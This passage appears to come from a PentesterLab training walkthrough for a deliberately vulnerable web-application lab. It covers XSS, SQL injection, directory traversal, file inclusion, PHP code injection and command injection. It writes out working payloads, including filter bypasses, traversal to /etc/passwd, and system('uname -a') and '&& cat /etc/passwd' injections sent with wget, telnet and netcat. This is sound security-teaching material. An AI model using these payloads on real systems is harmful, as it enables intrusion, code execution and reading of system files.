<p>Another easier bypass is to use the functions prompt or confirm in Javascript. They are less-known, but will give you the same result.</p>
<h3 id="Example_6">Example 6</h3><p>Here, the source code of the HTML page is a bit different. If you read it, you will see that the value you are sending is echoed back inside JavaScript code. To get your alert box, you will not need to inject a script tag, you will just need to correctly complete the pre-existing JavaScript code and add your own payload, then you will need to get rid of the code after your injection point by commenting it out (using //) or by adding some dummy code (var $dummy = “) to close it correctly.</p>
<h3 id="Example_7">Example 7</h3><p>This example is similar to the one before. This time, you won’t be able to use special characters, since they will be HTML-encoded. As you will see, you don’t really need any of these characters.</p>
<p>This issue is common in PHP web applications, because the well-known function used to HTML-encode characters (htmlentities) does not encode single quotes (‘), unless you told it to do so, using the ENT_QUOTES flag.</p>
<h3 id="Example_8">Example 8</h3><p>Here, the value echoed back in the page is correctly encoded. However, there is still a XSS vulnerability in this page. To build the form, the developer used and trusted PHP_SELF which is the path provided by the user. It’s possible to manipulate the path of the application in order to:</p>
<blockquote>
<ul>
<li>call the current page (however you will get an HTTP 404 page);</li>
<li>get a XSS payload in the page.</li>
</ul>
</blockquote>
<p>This can be done because the current configuration of the server will call /xss/example8.php when any URL matching /xss/example8.php/… is accessed. You can simply get your payload inside the page by accessing /xss/example8.php/[XSS_PAYLOAD]. Now that you know where to inject your payload, you will need to adapt it to get it to work and get the famous alert box.</p>
<p>Trusting the path provided by users is a common mistake, and it can often be used to trigger XSS, as well as other issues. This is pretty common in pages with forms, and in error pages (404 and 500 pages).</p>
<h3 id="Example_9">Example 9</h3><p>This example is a DOM-based XSS. This page could actually be completely static and still be vulnerable.</p>
<p>In this example, you will need to read the code of the page to understand what is happening. When the page is rendered, the JavaScript code uses the current URL to retrieve the anchor portion of the URL (#…) and dynamically (on the client side) write it inside the page. This can be used to trigger a XSS vulnerability, if you use the payload as part of the URL.</p>
<h2 id="SQL_injections">SQL injections</h2><p>SQL injections are one of the most common (web) vulnerabilities. All SQL injections exercises, found here, use MySQL for back-end. SQL injections come from a lack of encoding/escaping of user-controlled input when included in SQL queries.</p>
<p>Depending on how the information gets added in the query, you will need different things to break the syntax. There are three different ways to echo information in a SQL statement:</p>
<blockquote>
<ul>
<li>Using quotes: single quote or double quote.</li>
<li>Using back-ticks.</li>
<li>Directly.</li>
</ul>
</blockquote>
<p>For example, if you want to use information as a string you can do:<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> name=<span class="string">"root"</span>;</span></span><br></pre></td></tr></table></figure></p>
<p>or<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> name=<span class="string">'root'</span>;</span></span><br></pre></td></tr></table></figure></p>
<p>If you want to use information as an integer you can do:<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> id=<span class="number">1</span>;</span></span><br></pre></td></tr></table></figure></p>
<p>And finally, if you want to use information as a column name, you will need to do:<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">ORDER</span> <span class="keyword">BY</span> name;</span></span><br></pre></td></tr></table></figure></p>
<p>or<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="string">`name`</span>;</span></span><br></pre></td></tr></table></figure></p>
<p>It’s also possible to use an integer as string, but it will be slower:<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> id=<span class="string">'1'</span>;</span></span><br></pre></td></tr></table></figure></p>
<p>The way information is echoed back, and even what separator is used, will decide the detection technique to use. However, you don’t have this information, and you will need to try to guess it. You will need to formulate hypotheses and try to verify them. That’s why spending time poking around with the examples on the liveCD is so important.</p>
<h3 id="Example_1-1">Example 1</h3><p>In this first example, we can see that the parameter is a string, and we can see one line in the table. To understand the server side code, we need to start poking around:</p>
<blockquote>
<ul>
<li>If we add extra characters like “1234”, using ?name=root1234, no record is displayed in the table. From here, we can guess that the request uses our value in some kind of matching.</li>
<li>If we inject spaces in the request, using ?name=root+++ (after encoding), the record is displayed. MySQL (by default) will ignore trailing spaces in the string when performing the comparison.</li>
<li>If we inject a double quote, using ?name=root”, no record is displayed in the table.</li>
<li>If we inject a single quote, using ?name=root’, the table disappears. We probably broke something…</li>
</ul>
</blockquote>
<p>From this first part, we can deduce that the request must look like:<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> name=<span class="string">'[INPUT]'</span>;</span></span><br></pre></td></tr></table></figure></p>
<p>Now, let’s verify this hypothesis.</p>
<p>If we are right, the following injections should give the same results.</p>
<blockquote>
<ul>
<li>?name=root’ and ‘1’=’1: the quote in the initial query will close the one at the end of our injection.</li>
<li>?name=root’ and ‘1’=’1’ # (don’t forget to encode #): the quote in the initial query will be commented out.</li>
<li>?name=root’ and 1=1 # (don’t forget to encode #): the quote in the initial query will be commented out and we don’t need the ‘ in ‘1’=’1’.</li>
<li>?name=root’ # (don’t forget to encode #): the quote in the initial query will be commented out and we don’t need the 1=1.</li>
</ul>
</blockquote>
<p>Now these requests may not return the same thing:</p>
<blockquote>
<ul>
<li>?name=root’ and ‘1’=’0: the quote in the initial query will close the one at the end of our injection. The page should not return any result (empty table), since the selection criteria always returns false.</li>
<li>?name=root’ and ‘1’=’1 # (don’t forget to encode #): the quote in the initial query will be commented out. We should have the same result as the query above.</li>
<li>?name=root’ or ‘1’=’1: the quote in the initial query will close the one at the end of our injection. or will select all results, with the second part being always true. It may give the same result, but it’s unlikely, since the value is used as a filter for this example (as opposed to a page only showing one result at a time).</li>
<li>?name=root’ or ‘1’=’1’ # (don’t forget to encode #): the quote in the initial query will be commented out. We should have the same result as the query above.</li>
</ul>
</blockquote>
<p>With all these tests, we can be sure that we have a SQL injection. This training only focuses on detection. You can look into other PentesterLab training, and learn how to exploit this type of issues.</p>
<h3 id="Example_2-1">Example 2</h3><p>In this example, the error message gives away the protection created by the developer: ERROR NO SPACE. This error message appears as soon as a space is injected inside the request. It prevents us from using the ‘ and ‘1’=’1 method, or any fingerprinting that use the space character. However, this filtering is easily bypassed, using tabulation (HT or \t). You will need to use encoding, to use it inside the HTTP request. Using this simple bypass, you should be able to see how to detect this vulnerability.</p>
<h3 id="Example_3-1">Example 3</h3><p>In this example, the developer blocks spaces and tabulations. There is a way to bypass this filter. You can use comments between the keywords to build a valid request without any space or tabulation. The following SQL comments can be used: /**/. By replacing all space/tabulation in the previous examples using this comment, you should be able to test for this vulnerability.</p>
<h3 id="Example_4-1">Example 4</h3><p>This example represents a typical mis-understanding of how to protect against SQL injection. In the 3 previous examples, using the function mysql_real_escape_string would have prevented the vulnerability. In this example, the developer used the same logic. However, the value used is an integer and is not echoed between single quote ‘. Since the value is directly put in the query, using mysql_real_escape_string does not prevent anything. Here, you only need to be able to add spaces and SQL keywords to break the syntax. The detection method is really similar to the one used for string-based SQL injection. You just don’t need the quote at the beginning of the payload.</p>
<p>Another method to detect this is to play with the integer. The initial request is >* ?id=2. By playing with the value 2, we can detect the SQL injection:</p>
<blockquote>
<ul>
<li>?id=2 # (# needs to be encoded) should return the same thing.</li>
<li>?id=3-1 should return the same thing. The database will automatically perform the subtraction and you will get the same result.</li>
<li>?id=2-0 should return the same thing.</li>
<li>?id=1+1 (+ needs to be encoded) should return the same thing. The database will automatically perform the addition and you will get the same result.</li>
<li>?id=2.0 should return the same thing.</li>
</ul>
</blockquote>
<p>And the following should not return the same results:</p>
<blockquote>
<ul>
<li>?id=2+1.</li>
<li>?id=3-0.</li>
</ul>
</blockquote>
<h3 id="Example_5-1">Example 5</h3><p>This example is really similar to the previous, detection-wise. If you look into the code, you will see that the developer tried to prevent SQL injection by using a regular expression:<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">'/^[0-9]+/'</span>, <span class="variable">$_GET</span>[<span class="string">"id"</span>])) {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"ERROR INTEGER REQUIRED"</span>); </span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>However, the regular expression used is incorrect; it only ensures that the parameter id starts with a digit. The detection method used previously can be used to detect this vulnerability.</p>
<h3 id="Example_6-1">Example 6</h3><p>This example is the other way around. The developer did a mistake in the regular expression again:<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">'/[0-9]+$/'</span>, <span class="variable">$_GET</span>[<span class="string">"id"</span>])) {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"ERROR INTEGER REQUIRED"</span>); </span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>This regular expression only ensures that the parameter id ends with a digit (thanks to the $ sign). It does not ensure that the beginning of the parameter is valid (missing ^). You can use the methods learnt previously. You just need to add an integer at the end of your payload. This digit can be part of the payload or placed after a SQL comment: 1 or 1=1 # 123.</p>
<h3 id="Example_7-1">Example 7</h3><p>Another and last example of bad regular expression:<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">'/^-?[0-9]+$/m'</span>, <span class="variable">$_GET</span>[<span class="string">"id"</span>])) {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"ERROR INTEGER REQUIRED"</span>); </span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>Here we can see that the beginning (^) and end ($) of the string are correctly checked. However, the regular expression contains the modifier PCRE_MULTILINE (/m). The multine modifier will only validate that one of the lines is only containing an integer, and the following values will therefore be valid (thanks to the new line in them):</p>
<blockquote>
<ul>
<li>123\nPAYLOAD;</li>
<li>PAYLOAD\n123;</li>
<li>PAYLOAD\n123\nPAYLOAD.</li>
</ul>
</blockquote>
<p>These values need to be encoded when used in a URL, but with the use of encoding and the techniques seen previously you should be able to detect this vulnerability.</p>
<h3 id="Example_8-1">Example 8</h3><p>In this example, the parameter name gives away where it will get echoed in the SQL query. If you look into MySQL documentation, there are two ways to provide a value inside an ORDER BY statement:</p>
<blockquote>
<ul>
<li>directly: ORDER BY name ;</li>
<li>between back-ticks: ORDER BY <code>name</code>.</li>
</ul>
</blockquote>
<p>The ORDER BY statement cannot be used with value inside single quote ‘ or double quote “. If this is used, nothing will get sorted, since MySQL considers these as constants.</p>
<p>To detect this type of vulnerability, we can try to get the same result using different payloads:</p>
<blockquote>
<ul>
<li>name` # (# needs to be encoded) should give the same results.</li>
<li>name` ASC # (# needs to be encoded) should give the same results.</li>
<li>name<code>,</code>name: the back-tick in the initial query will close the one at the end of our injection.</li>
</ul>
</blockquote>
<p>And the following payloads should give different results:</p>
<blockquote>
<ul>
<li>name` DESC # (# needs to be encoded).</li>
<li>name` should not give any result, since the syntax is incorrect.</li>
</ul>
</blockquote>
<h3 id="Example_9-1">Example 9</h3><p>This example is similar to the previous one, but instead of back-tick ``</p>
<p>There are other methods that can be used in this case, since we are directly injecting in the request without a back-tick before. We can use the MySQL IF statement to generate more payloads:</p>
<blockquote>
<ul>
<li>IF(1, name,age) should give the same results.</li>
<li>IF(0, name,age) should give different results. You can see that the columns are sorted by age, but the sort function compares the values as strings, not as integers (10 is smaller than 2). This is a side effect of IF that will sort values as strings if one of the column contains a string.</li>
</ul>
</blockquote>
<h2 id="Directory_traversal">Directory traversal</h2><p>Directory traversals come from a lack of filtering/encoding of information used as part of a path by an application.</p>
<p>As with other vulnerabilities, you can use the “same value technique” to test for this type of issue. For example, if the path used by the application inside a parameter is /images/photo.jpg. You can try to access:</p>
<blockquote>
<ul>
<li>/images/./photo.jpg: you should see the same file.</li>
<li>/images/../photo.jpg: you should get an error.</li>
<li>/images/../images/photo.jpg: you should see the same file again.</li>
<li>/images/../IMAGES/photo.jpg: you should get an error (depending on the file system) or something weird is going on.</li>
</ul>
</blockquote>
<p>If you don’t have the value images and the legitimate path looks like photo.jpg, you will need to work out what the parent repository is.</p>
<p>Once you have tested that, you can try to retrieve other files. On Linux/Unix the most common test cases is the /etc/passwd. You can test: images/../../../../../../../../../../../etc/passwd, if you get the passwd file, the application is vulnerable. The good news is that you don’t need to know the number of ../. If you put too many, it will still work.</p>
<p>Another interesting thing to know is that if you have a directory traversal in Windows, you will be able to access test/../../../file.txt, even if the directory test does not exist. This is not the case, on Linux. This can be really useful where the code concatenates user-controlled data, to create a file name. For example, the following PHP code is supposed to add the parameter id to get a file name (example<em>1.txt for example). On Linux, you won’t be able to exploit this vulnerability if there is no directory starting by example</em>, whereas on Windows, you will be able to exploit it, even if there is no such directory.<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$file</span> = <span class="string">"/var/files/example_"</span>.<span class="variable">$_GET</span>[<span class="string">'id'</span>].<span class="string">".txt"</span>;</span><br></pre></td></tr></table></figure></p>
<p>In these exercises, the vulnerabilities are illustrated by a script used inside an <img tag. You will need to read the HTML source (or use “Copy image URL”) to find the correct link, and start exploiting the issue.</p>
<h3 id="Example_1-2">Example 1</h3><p>The first example is a really simple directory traversal. You just need to go up in the file system, and then back down, to get any files you want. In this instance, you will be restricted by the file system permissions, and won’t be able to access /etc/shadow, for example.</p>
<p>In this example, based on the header sent by the server, your browser will display the content of the response. Sometimes the browser will send the response with a header Content-Disposition: attachment, and your browser will not display the file directly. You can open the file to see the content. This method will take you some time for every test.</p>
<p>Using a Linux/Unix system, you can do this more quickly, by using wget:<br><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">% wget -O - <span class="string">'http://vulnerable/dirtrav/example1.php?file=../../../../../../../etc/passwd'</span></span><br><span class="line">[<span class="keyword">...</span>]</span><br><span class="line">daemon:x:<span class="number">1</span>:<span class="number">1</span>:daemon:/usr/sbin:/bin/sh</span><br><span class="line">bin:x:<span class="number">2</span>:<span class="number">2</span>:bin:/bin:/bin/sh</span><br><span class="line">[<span class="keyword">...</span>]</span><br></pre></td></tr></table></figure></p>
<h3 id="Example_2-2">Example 2</h3><p>In this example, you can see that the full path is used to access the file. However, if you try to just replace it with /etc/passwd, you won’t get anything. It looks like a simple check is performed by the PHP code. You can however bypass it by keeping the beginning of the path and add your payload at the end, to go up and back down within the file system.</p>
<h3 id="Example_3-2">Example 3</h3><p>This example is based on a common problem when you exploit directory traversal: the server-side code adds its own suffix to your payload. This can be easily bypassed, by using a NULL BYTE (which you need to URL-encode as %00). Using NULL BYTE to get rid of any suffix added by the server-side code is a common bypass, and works really well in Perl and older versions of PHP.</p>
<p>In this code, the issue is simulated since PHP solved this type of bypass since the version <a href="http://php.net/releases/5_3_4.php" target="_blank" rel="external">5.3.4</a>.</p>
<h2 id="File_include">File include</h2><p>In a lot of applications, developers need to include files to load classes or to share some templates between multiple web pages.</p>
<p>File include vulnerabilities come from a lack of filtering when a user-controlled parameter is used as part of a file name in a call to an including function (require, require_once, include or include_once in PHP for example). If the call to one of these methods is vulnerable, an attacker will be able to manipulate the function to load his own code. File include vulnerabilities can also be used as a directory traversal to read arbitrary files. However, if the arbitrary code contains an opening PHP tag, the file will be interpreted as PHP code.</p>
<p>This including function can allow the loading of local resources or remote resource (a website, for example). If vulnerable, it will lead to:</p>
<blockquote>
<ul>
<li>Local File Include: LFI. A local file is read and interpreted.</li>
<li>Remote File Include: RFI. A remote file is retrieved and interpreted.</li>
</ul>
</blockquote>
<p>By default, PHP disables loading of remote files, thanks to the configuration option: allow_url_include. In the ISO, it has been enabled to allow you to test it.</p>
<h3 id="Example_1-3">Example 1</h3><p>In this first example, you can see an error message, as soon as you inject a special character (a quote, for example) into the parameter:<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Warning: <span class="keyword">include</span>(intro.php'): failed to <span class="keyword">open</span> stream: <span class="keyword">No</span> such <span class="keyword">file</span> or directory <span class="keyword">in</span> /<span class="keyword">var</span>/www/fileincl/example1.php <span class="keyword">on</span> <span class="keyword">line</span> 7 Warning: <span class="keyword">include</span>(): Failed opening 'intro.php'' <span class="keyword">for</span> inclusion (include_path='.:/usr/share/php:/usr/share/pear') <span class="keyword">in</span> /<span class="keyword">var</span>/www/fileincl/example1.php <span class="keyword">on</span> <span class="keyword">line</span> 7</span><br></pre></td></tr></table></figure></p>
<p>If you read the error message carefully, you can extract a lot of information:</p>
<blockquote>
<ul>
<li>The path of the script: /var/www/fileincl/example1.php.</li>
<li>The function used: include().</li>
<li>The value used in the call to include is the value we injected intro.php’ without any addition or filtering.</li>
</ul>
</blockquote>
<p>We can use the methods used to detect directory traversal, to detect file include. For example, you can try to include /etc/passwd by using the ../ technique.</p>
<p>We can test for Remote File Include, by requesting an external resource: <a href="https://pentesterlab.com/" target="_blank" rel="external">https://pentesterlab.com/</a>. We will see that the page from PentesterLab gets included inside the current page.</p>
<p>PentesterLab’s website also contains a test for this type of vulnerability. If you use the URL <a href="https://pentesterlab.com/test_include.txt" target="_blank" rel="external">https://pentesterlab.com/test_include.txt</a>. You should get the result of the function phpinfo() within the current page.</p>
<h3 id="Example_2-3">Example 2</h3><p>In a similar manner to directory traversal, this example adds its own suffix to the value provided. As before, you can get rid of the suffix (for LFI) using a NULL BYTE. For RFI, you can get rid of the suffix, by adding &blah= or ?blah= depending on your URL.</p>
<p>In this exercise, the code simulates the behaviour of older versions of PHP. PHP now correctly handles paths and they cannot be poisoned using a NULL BYTE, as they used to.</p>
<p>In this code, the issue is simulated, since PHP solved this type of bypass since the version (5.3.4)[<a href="http://php.net/releases/5_3_4.php" target="_blank" rel="external">http://php.net/releases/5_3_4.php</a>].</p>
<h2 id="Code_injection">Code injection</h2><p>In this section, we are going to work on code execution. Code executions come from a lack of filtering and/or escaping of user-controlled data. When you are exploiting a code injection, you will need to inject code within the information you are sending to the application. For example, if you want to run the command ls, you will need to send system(“ls”) to the application since it is a PHP application.</p>
<p>Just like other examples of web application issues, it’s always handy to know how to comment out the rest of the code (i.e.: the suffix that the application will add to the user-controlled data). In PHP, you can use // to get rid of the code added by the application.</p>
<p>As with SQL injection, you can use the same value technique to test and ensure you have a code injection:</p>
<blockquote>
<ul>
<li>By using comments and injecting /<em> random value </em>/.</li>
<li>By injecting a simple concatenation “.” (where “ are used to break the syntax and reform it correctly).</li>
<li>By replacing the parameter you provided by a string concatenation, for example “.”ha”.”cker”.” instead of hacker.</li>
</ul>
</blockquote>
<p>You can also use time-based detection for this issue by using the PHP function sleep. You will see a time difference between:</p>
<blockquote>
<ul>
<li>Not using the function sleep or calling it with a delay of zero: sleep(0).</li>
<li>A call to the function with a long delay: sleep(10).</li>
</ul>
</blockquote>
<h3 id="Example_1-4">Example 1</h3><p>This first example is a trivial code injection. If you inject a single quote, nothing happens. However, you can get a better idea of the problem by injecting a double quote:<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Parse error: syntax error, unexpected <span class="string">'!'</span>, expecting <span class="string">','</span> or <span class="string">';'</span> <span class="keyword">in</span> /var/www/codeexec/example1.<span class="function"><span class="title">php</span><span class="params">(<span class="number">6</span>)</span></span> : <span class="function"><span class="title">eval</span><span class="params">()</span></span><span class="string">'d code on line 1</span></span><br></pre></td></tr></table></figure></p>
<p>This could be the other way around; the single quote could generate an error where the double quote may not.</p>
<p>Based on the error message, we can see that the code is using the function eval: “Eval is evil…”.</p>
<p>We saw that the double quote breaks the syntax, and that the function eval seems to be using our input. From this, we can try to work out payloads that will give us the same results:</p>
<blockquote>
<ul>
<li>“.”: we are just adding a string concatenation; this should give us the same value.</li>
<li>“./<em>pentesterlab</em>/“: we are just adding a string concatenation and information inside comments; this should give us the same value.</li>
</ul>
</blockquote>
<p>Now that we have similar values working, we need to inject code. To show that we can execute code, we can try to run a command (for example uname -a using the code execution). The full PHP code looks like:<br><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">system<span class="comment">('uname -a')</span>;</span><br></pre></td></tr></table></figure></p>
<p>The challenge here is to break out of the code syntax and keep a clean syntax. There are many ways to do it:</p>
<blockquote>
<ul>
<li>By adding dummy code: “.system(‘uname -a’); $dummy=”.</li>
<li>By using comment: “.system(‘uname -a’);# or “.system(‘uname -a’);//.</li>
</ul>
</blockquote>
<p>Don’t forget that you will need to URL-encode some of the characters (# and ;) before sending the request.</p>
<h3 id="Example_2-4">Example 2</h3><p>When ordering information, developers use two methods:</p>
<blockquote>
<ul>
<li>order by in a SQL request;</li>
<li>usort in PHP code.</li>
</ul>
</blockquote>
<p>The function usort is often used with the function create_function to dynamically generate the “sorting” function, based on user-controlled information. If the web application lacks potent filtering and validation, this can lead to code execution.</p>
<p>By injecting a single quote, we can get an idea of what is going on:<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Parse</span> <span class="keyword">error</span>: <span class="keyword">syntax</span> <span class="keyword">error</span>, unexpected T_CONSTANT_ENCAPSED_STRING <span class="keyword">in</span> /<span class="keyword">var</span>/www/codeexec/example2.php(22) : runtime-created function <span class="keyword">on</span> <span class="keyword">line</span> 1 Warning: usort() expects parameter 2 to be a valid callback, <span class="keyword">no</span> array or string given <span class="keyword">in</span> /<span class="keyword">var</span>/www/codeexec/example2.php <span class="keyword">on</span> <span class="keyword">line</span> 22</span><br></pre></td></tr></table></figure></p>
<p>The source code of the function looks like the following:<br><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ZEND_FUNCTION(create_function)</span><br><span class="line">{</span><br><span class="line"> [<span class="keyword">...</span>]</span><br><span class="line"> eval_code = (char *) emalloc(eval_code_length);</span><br><span class="line"> sprintf(eval_code, <span class="string">"function "</span> LAMBDA_TEMP_FUNCNAME <span class="string">"(%s){%s}"</span>, Z_STRVAL_PP(z_function_args), Z_STRVAL_PP(z_function_code));</span><br><span class="line"></span><br><span class="line"> eval_name = zend_make_compiled_string_description(<span class="string">"runtime-created function"</span> TSRMLS_CC);</span><br><span class="line"> retval = zend_eval_string(eval_code, <span class="literal">NULL</span>, eval_name TSRMLS_CC);</span><br><span class="line"> [<span class="keyword">...</span>]</span><br></pre></td></tr></table></figure></p>
<p>We can see that the code that will be evaluated is put inside curly brackets {…}, and we will need this information to correctly finish the syntax, after our injection.</p>
<p>As opposed to the previous code injection, here, you are not injecting inside single or double quotes. We know that we need to close the statement with } and comment out the rest of the code using // or # (with encoding). We can try poking around with:</p>
<blockquote>
<ul>
<li>?order=id;}//: we get an error message (Parse error: syntax error, unexpected ‘;’). We are probably missing one or more brackets.</li>
<li>?order=id);}//: we get a warning. That seems about right.</li>
<li>?order=id));}//: we get an error message (Parse error: syntax error, unexpected ‘)’ i). We probably have too many closing brackets.</li>
</ul>
</blockquote>
<p>Since we now know how to finish the code correctly (a warning does not stop the execution flow), we can inject arbitrary code and gain code execution using ?order=id);}system(‘uname%20-a’);// for example.</p>
<h3 id="Example_3-3">Example 3</h3><p>We talked earlier about regular expression modifiers with multi-line regular expression. Another very dangerous modifier exists in PHP: PCRE_REPLACE_EVAL (/e). This modifier will cause the function preg_replace to evaluate the new value as PHP code, before performing the substitution.</p>
<p><code>PCRE_REPLACE_EVAL</code> has been deprecated as of PHP 5.5.0<br>Here, you will need to change the pattern, by adding the /e modifier. Once you have added this modifier, you should get a notice:<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Notice: <span class="operator"><span class="keyword">Use</span> <span class="keyword">of</span> undefined constant hacker - assumed <span class="string">'hacker'</span> <span class="keyword">in</span> /<span class="keyword">var</span>/www/codeexec/example3.php(<span class="number">3</span>) : <span class="keyword">regexp</span> code <span class="keyword">on</span> line <span class="number">1</span></span></span><br></pre></td></tr></table></figure></p>
<p>The function preg_replace tries to evaluate the value hacker as a constant but it’s not defined, and you get this message.</p>
<p>You can easily replace hacker with a call to the function phpinfo() to get a visible result. Once you can see the result of the phpinfo function, you can use the function system to run any command.</p>
<h3 id="Example_4-2">Example 4</h3><p>This example is based on the function assert. When used incorrectly, this function will evaluate the value received. This behaviour can be used to gain code execution.<br>By injecting a single quote or double quote (depending on the way the string was declared), we can see an error message indicating that PHP tried to evaluate the code:<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Parse</span> <span class="keyword">error</span>: <span class="keyword">syntax</span> <span class="keyword">error</span>, unexpected T_ENCAPSED_AND_WHITESPACE <span class="keyword">in</span> /<span class="keyword">var</span>/www/codeexec/example4.php(4) : <span class="keyword">assert</span> code <span class="keyword">on</span> <span class="keyword">line</span> 1 Catchable fatal <span class="keyword">error</span>: <span class="keyword">assert</span>(): Failure evaluating code: 'hacker'' <span class="keyword">in</span> /<span class="keyword">var</span>/www/codeexec/example4.php <span class="keyword">on</span> <span class="keyword">line</span> 4</span><br></pre></td></tr></table></figure></p>
<p>Once we broke the syntax, we need to try to reconstruct it correctly. We can try the following: hacker’.’. The error message disappeared.</p>
<p>Now that we know how to finish the syntax to avoid errors, we can just inject our payload to run the function phpinfo(): hacker’.phpinfo().’ and we get the configuration of the PHP engine in the page.</p>
<h2 id="Command_injection">Command injection</h2><p>Command injection comes from a lack of filtering and encoding of information used as part of a command. The simplest example comes from using the function system (to run commands) and take an HTTP parameter as an argument of this command.</p>
<p>There are many ways to exploit a command injection:</p>
<blockquote>
<ul>
<li>By injecting the command inside backticks, for example <code>id</code></li>
<li>By redirecting the result of the first command into the second | id</li>
<li>By running another command if the first one succeeds: && id (where & needs to be encoded)</li>
<li>By running another command if the first one fails (and making sure it does: error || id (where error is just here to cause an error).<br>It’s also possible to use the same value technique to perform this type of detection. For example, you can replace 123 with <code>echo 123</code>. The command inside backticks will be executed first, and return exactly the same value to be used by the command.</li>
</ul>
</blockquote>
<p>You can also use time-based vectors to detect these kinds of vulnerabilities. You can use a command that will take time to process on the server (with a risk of denial of service). You can also use the command sleep to tell the server to wait a certain amount of time before continuing. For example, using sleep 10.</p>
<h3 id="Example_1-5">Example 1</h3><p>The first example is a trivial command injection. The developer didn’t perform any input validation, and you can directly inject your commands after the ip parameter.</p>
<p>Based on the techniques seen above, you can for example, use the payload && cat /etc/passwd (with encoding) to see the content of /etc/passwd.</p>
<h3 id="Example_2-5">Example 2</h3><p>This example validates the parameter provided, but does so incorrectly. As we saw before with the SQL injection, the regular expression used is multi-line. Using the same technique we saw for the SQL injection, you can easily gain code execution.</p>
<p>The good thing here is that you don’t even need to inject a separator. You can just add the encoded new line (%0a) and then put your command.</p>
<h3 id="Example_3-4">Example 3</h3><p>This example is really similar to the previous one; the only difference is that the developer does not stop the script correctly. In PHP, an easy and simple way to redirect users if one of the value provided doesn’t match some security constraint is to call the function header. However, even if the browser will get redirected, this function does not stop the execution flow, and the script will still finish to run with the dangerous parameter. The developer needs to call the function die after the call to the function header, to avoid this issue.</p>
<p>You cannot easily exploit this vulnerability in your browser, since your browser will follow the redirect, and will not display the redirecting page. To exploit this issue you can use telnet:<br><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">% telnet vulnerable <span class="number">80</span> </span><br><span class="line">GET /commandexec/example3.php?ip=<span class="number">127.0</span>.<span class="number">0.1</span><span class="string">|uname+-a HTTP/1.0</span></span><br></pre></td></tr></table></figure></p>
<p>or using netcat:<br><figure class="highlight nimrod"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">% echo <span class="string">"GET /commandexec/example3.php?ip=127.0.0.1|uname+-a HTTP/1.0\r\n"</span> | nc vulnerable <span class="number">80</span></span><br></pre></td></tr></table></figure></p>
<p>If you look carefully at the response, you will see that you get a 302 redirect, but you can see the result of the command uname -a in the body of the response.</p>
<h2 id="LDAP_attacks">LDAP attacks</h2><p>In this section, we will cover LDAP attacks. LDAP is often used as a backend for authentication, especially in Single-Sign-On (SSO) solutions. LDAP has its own syntax that we will see in more detail, in the following examples.</p>
